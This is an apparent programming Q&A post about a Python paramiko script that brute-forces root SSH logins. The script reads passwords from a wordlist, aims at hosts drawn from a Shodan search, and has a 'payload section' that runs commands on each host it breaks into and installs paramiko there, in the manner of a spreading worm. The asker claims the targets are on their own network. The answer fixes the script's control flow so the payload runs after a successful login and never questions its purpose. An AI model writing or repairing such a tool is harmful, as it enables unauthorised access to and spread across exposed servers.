# AttributeError: 'NoneType' object has no attribute 'open_session'

Tags: python, python-3.x, ssh, python-3.7, paramiko

When running my python3 file containing the following code where im trying to brute force some ssh devices on my own network with paramiko and at first i was getting some auth errors but fixed that with except paramiko.ssh_exception.AuthenticationException and now i seem to be pulling errors on calling and using parimiko install using pip3 i think? im fairly novice to python so any guidance would be greatly appreciated thanks

```
def spread(ip, password):   

client = None
try:
    ssh = paramiko.SSHClient()
    client = paramiko.SSHClient()
    client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    client.connect(ip, username="root", password=password, port=22, banner_timeout=200)
except paramiko.ssh_exception.NoValidConnectionsError as e:
    print("username not exists")
except paramiko.ssh_exception.AuthenticationException as e:
    print("passwd not correct")
except Exception as e:
    print("*** Caught exception: %s: %s" % (e.__class__, e))
    #paramiko.traceback.print_exc()
#return client

#payload section
ssh_stdin, ssh_stdout, ssh_stderr = client.exec_command("some commands here")
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("pip3 install paramiko") 

exit_code = ssh_stdout.channel.recv_exit_status() # handles async exit error
#end payload section

def scan():    
api = shodan.Shodan(API_KEY)

# Perform the search for devices on my own authorized network
 
#function to get ips here
for service in result['matches']:
        ip = #ips from list here
        file = open('req.txt', 'r') 
        passwords = file.readlines() 
        for password in passwords:
            print('Attacking (host:pass): ' + ip + ':' + password) 
            spread(ip, password)
scan()
```

I receive this error:

```
Attacking (host:pass): "my ip here":root

passwd not correct
Traceback (most recent call last):
 File "XTERM_proc.py", line 65, in <module>
scan()
 File "XTERM_proc.py", line 64, in scan
spread(ip, password)
 File "XTERM_proc.py", line 42, in spread
ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("pip3 install paramiko") 
 File "/Library/Frameworks/Python.framework/Versions/3.7/lib/python3.7/site-packages/paramiko/client.py", line 508, in exec_command
chan = self._transport.open_session(timeout=timeout)
 AttributeError: 'NoneType' object has no attribute 'open_session'
```

Answer (score 1):

```py
def spread(ip, password):   

    client = None
    try:
        ssh = paramiko.SSHClient()
        client = paramiko.SSHClient()
        client.set_missing_host_key_policy(paramiko.AutoAddPolicy())
        client.connect(ip, username="root", password=password, port=22, 
                       banner_timeout=200)

        #payload section
        ssh_stdin, ssh_stdout, ssh_stderr = client.exec_command("some commands here")
        ssh_stdin, ssh_stdout, ssh_stderr = ssh.exec_command("pip3 install paramiko") 

        exit_code = ssh_stdout.channel.recv_exit_status() # handles async exit error
        #end payload section
    except paramiko.ssh_exception.NoValidConnectionsError as e:
        print("username not exists")
    except paramiko.ssh_exception.AuthenticationException as e:
       print("passwd not correct")
    except Exception as e:
        print("*** Caught exception: %s: %s" % (e.__class__, e))
        #paramiko.traceback.print_exc()
```

The reason for your error is likely because your code already printed `passwd not correct` which means that the code inside the `try` section hasn't executed properly. I've moved the statements inside the payload section to inside the `try` part to make them execute only as long as the previous statements succeed.

By putting them outside, you're making them run irrespective of whether or not the password/username works.